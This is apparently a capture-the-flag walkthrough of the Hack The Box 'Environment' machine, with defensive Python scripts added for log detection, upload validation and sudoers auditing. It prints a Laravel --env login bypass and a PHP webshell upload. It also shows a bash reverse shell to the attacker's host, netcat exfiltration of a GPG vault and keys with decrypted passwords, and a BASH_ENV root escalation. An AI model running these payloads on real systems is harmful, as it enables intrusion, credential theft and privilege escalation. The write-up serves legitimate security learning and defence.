🧧Environment
https://app.hackthebox.com/machines/Environment

Used the htbscan script for recon and checked its dir/dns/vhost results.
Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 10.129.186.191 -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 21:27 CEST
Nmap scan report for 10.129.186.191
Host is up (0.027s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_ 256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Did not follow redirect to http://environment.htb
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Website

Login-Page
Our recon script shows us a login page:
# Dirsearch started Sat May 3 21:36:59 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://environment.htb:80 -e php,html,txt,js,conf,config,bak -t 50 -o web/port_80/environment.htb/dirsearch_results.txt --quiet
403 555B http://environment.htb/%2e%2e;/test
<snipped>
200 4KB http://environment.htb/index.php
200 2KB http://environment.htb/index.php/login/

User
Laravel
Our feroxbuster scan shows us an upload page:
Configuration {
kind: "configuration",
wordlist: "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt",
config: "/etc/feroxbuster/ferox-config.toml",
proxy: "",
replay_proxy: "",
server_certs: [],
client_cert: "",
client_key: "",
target_url: "http://environment.htb:80",
status_codes: [
<snipped>
405 GET 2575l 8675w 244839c http://environment.htb/upload

Laravel version identified: Laravel 11.30.0
PHP version: 8.2.28
APP_DEBUG=True, since the stack trace is shown in error responses

The application is also detected as running with environment=preprod.
We can bypass the login page by appending ?--env=preprod to the URL of the login POST request while intercepting it; this is the --env argument injection covered by the Laravel security advisory: https://github.com/laravel/framework/security/advisories/GHSA-gv7v-rgg6-548h
POST /login?--env=preprod HTTP/1.1
Host: environment.htb
Content-Length: 98
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://environment.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://environment.htb/login?--env=preprod
Cookie: XSRF-TOKEN=eyJpdiI6IjVJMEtOSWdrelVONzEzNjE5RFpDdkE9PSIsInZhbHVlIjoiblN3R2NYY0pSUVk1V1NHZ3ZRa0lxTXBkZ1dMYWJ6Y1hFUUVGMjJHLzBSRE56ZEVnYjhySGpwNW11ZUZCdmxFZHovY3F6WDA5ckt5bWdsM3lNeEkrVktiVXJGbTEzUUx3ai9KcXNQSGVtL3Rweit0VldmSVhFSUszSjVzYncwWHgiLCJtYWMiOiI4OTI4YjFhYTZhMGQ5ZDg0YzUxMDA5NjNiMDhlNzI4MzVmNjMzNzBmNTNjYWU5NGU1YmQ2NDUyNjc3YzVlZmRkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBQdWR6OG1ZKy9WTVgzYjJyWHVnM2c9PSIsInZhbHVlIjoiMVlFMlNNTDV4ZnVVbnI0SkR6dTNBOUlRSWdiZ0J4cHFjU29rTXgvZ04rVSs3ZElYNU5ma2pUdE50d3lBK1MwS1NJRFEyd2hzZDJjYVZva1hYTTY2S0lNRXlhZW5NQVlMOElFZUlhR1Q5Q0tXK3VWVGlzbWMzNW1wTytHcDYxRC8iLCJtYWMiOiJmMTZmMmVmMmRmMGEzMzYzODY1YjBiYzg1ODY3MjNhNmNmMjVkYzM2NzE1NjQyYmJkZmU3MDdmYTYzNjNmZWUzIiwidGFnIjoiIn0%3D
Connection: keep-alive
<snipped>
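The bypass above leaves a clear trace in the web server's access log: a query-string key that starts with "--". The following detection script is an added example, not part of the original write-up or of the box; it assumes nginx's default "combined" log format and runs over constructed sample lines (the IPs and timestamps are made up, not captured traffic). It percent-decodes the query so an encoded "%2D%2Denv" is caught as well.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Regex for nginx's default "combined" access-log format; only the fields we need are named.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3})'
)

# Constructed sample lines (not traffic captured from the box); the first, third and
# fifth carry a query key starting with "--", the pattern used by the login bypass.
SAMPLE_LOG = """\
10.10.14.5 - - [03/May/2025:21:40:01 +0200] "POST /login?--env=preprod HTTP/1.1" 302 0 "http://environment.htb/login" "Mozilla/5.0"
10.10.14.5 - - [03/May/2025:21:40:02 +0200] "GET /management/dashboard HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.6 - - [03/May/2025:21:41:10 +0200] "GET /login?--env=local HTTP/1.1" 200 2048 "-" "curl/8.5.0"
10.10.14.7 - - [03/May/2025:21:42:00 +0200] "GET /login?redirect=%2Fdashboard HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.8 - - [03/May/2025:21:43:00 +0200] "GET /index.php?%2D%2Denv=preprod&x=1 HTTP/1.1" 200 4096 "-" "python-requests/2.32"
"""


def option_like_params(target: str) -> list[str]:
    """Return query keys that look like CLI options (start with "--") after percent-decoding."""
    query = urlsplit(target).query
    return [key for key, _ in parse_qsl(query, keep_blank_values=True) if key.startswith("--")]


def find_env_overrides(log_text: str) -> list[dict]:
    """Scan access-log text and report requests whose query string smuggles --options."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on malformed input
        params = option_like_params(m["target"])
        if params:
            findings.append({"ip": m["ip"], "time": m["time"], "target": m["target"],
                             "status": int(m["status"]), "params": params})
    return findings


if __name__ == "__main__":
    for f in find_env_overrides(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['target']} -> {f['params']} (HTTP {f['status']})")
```

Flagging every "--" key rather than only "--env" is deliberate: the underlying weakness is that query parameters reach the framework's argument parsing, so any option name is suspicious. The durable fix is upgrading Laravel to a release that contains the fix referenced in the advisory; the log check is for spotting attempts against instances that are still behind.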
Reverse-Shell
We are redirected to the dashboard.

Now we upload a webshell as the user picture; the upload filter has to be bypassed, which the request below does with a trailing dot on the .php filename, an image/gif content type and a GIF89a header in front of the PHP code.

POST /upload HTTP/1.1
Host: environment.htb
Content-Length: 375
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryztxdKMH8xPKzFn4L
Accept: */*
Origin: http://environment.htb
Referer: http://environment.htb/management/profile
Accept-Encoding: gzip, deflate, br
Cookie: XSRF-TOKEN=eyJpdiI6ImtLU1RTL1lOTU9ydEFEY2pVdTNhaGc9PSIsInZhbHVlIjoib3BieVM3YlRjamN3aGhEZm1CL1pMUWh6YXlkdGNISVlXVnlTVGNJdkZaUVJCWDY4aW1ka3RvY3hqWFFHRDBORnluY2hKYy9GNGI5Y05ZaUttQmo2MXNkaEZzOHVGeU1tNzB1ODJ5YU8wOHRDRHBIZkx1MHg4dGMwMWNVZEZVWnMiLCJtYWMiOiI5MGIzYmJmMjAwYjE3ZjAxNDE5MjFlZGU5NThkNGQyYTI5N2U0ZTNiZGRjNjQ3MDI5NmFhZmY0OTliNWY0ZWRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyUVN1dkEwVlFxMWtTZDFJbTFkYlE9PSIsInZhbHVlIjoiTzdFK1NSbStnamZLUTJIdGNIVWRNQnorV3oxZ28yeXN0LzltY2FUVVA3aUJOVlJuUUNxWGRjTjN5djRxZnB2ajZqWVJrQmQvd3ZDTjFQWlFyNGhEVzFvYVJxMS84RGg0bHZ0T0FuWlVHenBDY09ibCt1dS9jeXp0NkU0UHRlTzYiLCJtYWMiOiIzMjUyYmZlY2ZmZjgzM2FmM2I0YjRkMzlhNzA5NTczNWUxYzcxNjU2OGQxNDUxZmQ1M2FlY2U2ZmEwZjljZTZiIiwidGFnIjoiIn0%3D
Connection: keep-alive
------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="_token"
0izP6cv3a40dMWSXe2S9fFCNdll7KlolLrdzga2E
------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="upload"; filename="simple-backdoor.php."
Content-Type: image/gif
GIF89a;
<?=$_="cmd";@system($_REQUEST[$_]);?>
------WebKitFormBoundaryztxdKMH8xPKzFn4L--
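The request above gets through because the filter trusts three client-controlled things: the raw filename suffix, the declared content type and the first few bytes. The validator below is an added example (not the application's code, which we never saw) that puts such a naive check next to a hardened one; the payload and filename are constructed stand-ins, and the storage name the hardened version returns is an assumption about how a safe upload handler would name files.

```python
import os
import re
import secrets

# Magic bytes an image of each allowed extension must begin with.
IMAGE_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
SCRIPT_EXTENSIONS = (".php", ".phtml", ".phar")
# Matches the PHP open tags "<?php", "<?=" and the bare "<?".
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)?", re.IGNORECASE)

# Constructed stand-in for the request above: a GIF89a header followed by PHP, sent
# with a filename that carries a trailing dot. Not the write-up's payload itself.
CONSTRUCTED_PAYLOAD = b"GIF89a;<?php /* stand-in for a PHP payload */ ?>"
CONSTRUCTED_FILENAME = "simple-backdoor.php."
GENUINE_GIF = b"GIF89a" + bytes(16)  # constructed minimal "image" for comparison


def naive_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """A filter of the kind the upload request slips past: blocklist on the raw
    filename suffix, trust the declared content type, check a few magic bytes."""
    if filename.lower().endswith(SCRIPT_EXTENSIONS):
        return False
    if not content_type.startswith("image/"):
        return False
    return any(data.startswith(magic) for magics in IMAGE_MAGIC.values() for magic in magics)


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason_or_storage_name). The declared content type is
    ignored entirely: the client controls it, so it carries no information."""
    # Normalise the name the way a filesystem would before deciding on it: drop any
    # directory part and the trailing dots/spaces that the naive suffix check missed.
    base = os.path.basename(filename).strip().rstrip(". ")
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_MAGIC:  # allowlist, never a blocklist
        return False, f"extension .{ext} not allowed"
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, f"content does not look like a .{ext} image"
    if PHP_OPEN_TAG.search(data):
        # Cheap extra check; a real image can contain "<?" by chance, so re-encoding
        # the image server-side is the more robust option in production.
        return False, "embedded PHP open tag"
    # Never reuse the client's name: the file is stored under a random server-chosen
    # name, so double extensions and handler quirks in the web server do not matter.
    return True, f"{secrets.token_hex(8)}.{ext}"
```

The two checks that matter most are the allowlist on the normalised extension and the server-chosen storage name; the magic-byte and open-tag scans only add defence in depth. Serving the upload directory with script execution disabled (no PHP handler for /storage/) would have contained this even with the filter as it was.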

Start a listener, then trigger the reverse shell by requesting the uploaded file with the command in the cmd parameter:
➜ rlwrap nc -nlvp 4242
listening on [any] 4242 ...
Request sent from the browser (the shell below arrives once it is loaded):
http://environment.htb/storage/files/simple-backdoor.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/<yourip>/4242+0%3E%261%27
connect to [ip] from (UNKNOWN) [htbip] 55996
bash: cannot set terminal process group (930): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@environment:~/app/storage/app/public/files$
And we get our user flag:
➜ rlwrap nc -nlvp 4242
listening on [any] 4242 ...
connect to [ip] from (UNKNOWN) [htbip] 56386
bash: cannot set terminal process group (964): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ cd /home
cd /home
www-data@environment:/home$ ls
ls
hish
www-data@environment:/home$ cd hish
cd hish
www-data@environment:/home/hish$ ls
ls
backup
user.txt
www-data@environment:/home/hish$ cat user.txt
cat user.txt
<flag>
Root
Continuing in our shell, we pull the backup file keyvault.gpg (and, below, hish's ~/.gnupg, both readable by www-data) over to our machine.
www-data@environment:/home/hish$ cd backup
cd backup
www-data@environment:/home/hish/backup$ ls
ls
keyvault.gpg
➜ nc -nlvp 4444 > keyvault.gpg
listening on [any] 4444 ...
www-data@environment:/home/hish/backup$ nc <yourip> 4444 < keyvault.gpg
Press Ctrl-C on the attacker side once you think the file has been transferred; it is quite small, so this should only take a few seconds.
The same for the keys (first line on the attacker side, second line on the target):
➜ nc -lvp 4444 > gnupg.tar
www-data@environment:/home/hish/backup$ tar -cvf - /home/hish/.gnupg | nc <your_local_ip> 4444
➜ tar -xvf gnupg.tar
home/hish/.gnupg/
home/hish/.gnupg/private-keys-v1.d/
home/hish/.gnupg/private-keys-v1.d/C2DF4CF8B7B94F1EEC662473E275A0E483A95D24.key
home/hish/.gnupg/private-keys-v1.d/3B966A35D4A711F02F64B80E464133B0F0DBCB04.key
home/hish/.gnupg/trustdb.gpg
home/hish/.gnupg/pubring.kbx
home/hish/.gnupg/openpgp-revocs.d/
home/hish/.gnupg/openpgp-revocs.d/F45830DFB638E66CD8B752A012F42AE5117FFD8E.rev
home/hish/.gnupg/pubring.kbx~
home/hish/.gnupg/random_seed
➜ mv ~/.gnupg/ /tmp
➜ mv ./home/hish/.gnupg ~
➜ gpg --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir '/home/kali/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
Move your own gnupg folder back afterwards:
➜ rm -rf ~/.gnupg
➜ mv /tmp/.gnupg ~
Log in using those credentials:
➜ ssh hish@environment.htb
hish@environment.htb's password: marineSPm@ster!!
Linux environment 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 4 18:07:17 2025 from
Checking what we can run with sudo and inspecting the script:
hish@environment:~$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
hish@environment:~$ file /usr/bin/systeminfo
/usr/bin/systeminfo: Bourne-Again shell script, ASCII text executable
hish@environment:~$ ls -l /usr/bin/systeminfo
-rwxr-xr-x 1 root root 452 Jan 12 12:11 /usr/bin/systeminfo
hish@environment:~$ head -n 10 /usr/bin/systeminfo
#!/bin/bash
echo -e "\n### Displaying kernel ring buffer logs (dmesg) ###"
dmesg | tail -n 10
echo -e "\n### Checking system-wide open ports ###"
ss -antlp
echo -e "\n### Displaying information about all mounted filesystems ###"
mount | column -t
The script /usr/bin/systeminfo is a bash script run as root, and it calls dmesg, ss, mount and column by bare name rather than by absolute path. Hijacking those through PATH does not get us anywhere, though, because the sudoers entry sets secure_path. What does get us root is env_keep+="ENV BASH_ENV": sudo keeps those two variables, and a non-interactive bash sources the file named in BASH_ENV before it runs the script.
echo 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.sh ; chmod +x /tmp/root.sh ; env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfo

Hijacking via BASH_ENV
Here's how it works:
/tmp/root.sh: the command echo 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.sh creates a new script at /tmp/root.sh with these contents:
echo "BASH_ENV sourced as root!"
id
/bin/bash -p
The first line prints a message indicating that BASH_ENV has been sourced. The second line (id) shows the user ID, which should be root when executed with elevated privileges. The third line (/bin/bash -p) starts a new interactive shell in privileged mode, so bash keeps its effective user id (root) instead of resetting it to the real one.
Exploiting with env -i and sudo:
The command:
env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfo
env -i runs a command with a clean environment (i.e., it clears all environment variables except those explicitly passed). BASH_ENV=/tmp/root.sh sets the BASH_ENV variable to point to the script /tmp/root.sh. The PATH variable is set to the default system PATH, which is fine for running standard commands, including sudo and /usr/bin/systeminfo. sudo runs the systeminfo script with root privileges, but BASH_ENV is now set to /tmp/root.sh, so that script is sourced first and the root shell is spawned.
Why this works
sudo does not strip BASH_ENV: env_reset normally clears the environment, but this sudoers file explicitly adds ENV and BASH_ENV to env_keep, so both survive into the root process. That lets you control the environment in which systeminfo is executed, which amounts to injecting your own commands as root.
Bypassing restrictions: using env -i to clear everything except BASH_ENV and PATH keeps the test clean; it prevents any other environment variables that might be present from interfering.
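The sudoers line is the whole problem here: no amount of care inside systeminfo helps while ENV and BASH_ENV are kept, because bash evaluates BASH_ENV before the script's first line runs. The audit below is an added example (not from the box or the write-up) that parses `sudo -l` output, which is reproduced as a constructed sample, and flags env_keep entries that let a caller steer what a root-run command executes. The list of dangerous variables is my own choice, not something sudo ships.

```python
import re

# Variables that let an unprivileged caller change what a root-run interpreter or binary
# executes if sudo passes them through. ENV and BASH_ENV are the ones this box keeps.
DANGEROUS_ENV = {"ENV", "BASH_ENV", "LD_PRELOAD", "LD_LIBRARY_PATH", "PERL5LIB",
                 "PYTHONPATH", "PYTHONSTARTUP"}

ENV_KEEP = re.compile(r'env_keep\+?="([^"]*)"')
# "(ALL) /usr/bin/systeminfo" or "(ALL : ALL) NOPASSWD: /bin/foo"
COMMAND_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+.*)$")

# Constructed copy of the `sudo -l` output shown above, used as sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
"""


def kept_dangerous_vars(sudo_l_output: str) -> list[str]:
    """Names from env_keep that can redirect execution of the permitted commands."""
    kept = set()
    for m in ENV_KEEP.finditer(sudo_l_output):
        kept.update(m.group(1).split())
    return sorted(kept & DANGEROUS_ENV)


def permitted_commands(sudo_l_output: str) -> list[str]:
    """Commands listed under 'may run the following commands'."""
    cmds = []
    in_commands = False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if in_commands:
            m = COMMAND_LINE.match(line)
            if m:
                cmds.append(m["cmd"].strip())
    return cmds


def audit(sudo_l_output: str) -> list[str]:
    """Human-readable findings; an empty list means nothing was flagged."""
    findings = []
    risky = kept_dangerous_vars(sudo_l_output)
    if risky:
        for cmd in permitted_commands(sudo_l_output):
            findings.append(f"{cmd}: env_keep passes {', '.join(risky)} through to the root "
                            f"process; remove them from env_keep in sudoers.")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(finding)
```

The remediation is the one the finding text states: drop ENV and BASH_ENV from env_keep (env_reset already removes them by default). Using absolute paths inside the script is still good hygiene, but it is secure_path, not the script, that closed the PATH route on this box.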